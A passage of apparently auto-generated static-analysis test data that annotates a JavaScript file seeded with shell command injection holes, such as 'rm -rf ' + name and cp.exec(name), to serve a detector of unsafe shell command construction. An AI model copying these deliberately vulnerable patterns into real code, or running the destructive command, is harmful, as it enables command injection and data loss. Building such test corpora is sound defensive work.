enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:18 | "rm -rf " | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:22:65:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:22:65:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:22:65:25 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:22:65:25 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:22:65:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:22:65:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | cp.exec(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | exceptional return of cp.exec(name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | exceptional return of cp.exec(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | exceptional return of cp.exec(name) | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | exceptional return of cp.exec(name) | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:2:67:14 | exceptional return of cp.exec(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:5:67:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:5:67:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:5:67:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:5:67:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:5:67:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:67:10:67:13 | name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | cp.exec ... a end") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | exceptional return of cp.exec ... a end") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | exceptional return of cp.exec ... a end") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | exceptional return of cp.exec ... a end") | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | exceptional return of cp.exec ... a end") | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:2:69:48 | exceptional return of cp.exec ... a end") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:5:69:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:5:69:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:5:69:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:5:69:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:5:69:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:69:10:69:23 | "for foo in (" | contextFunctionInterfaces | 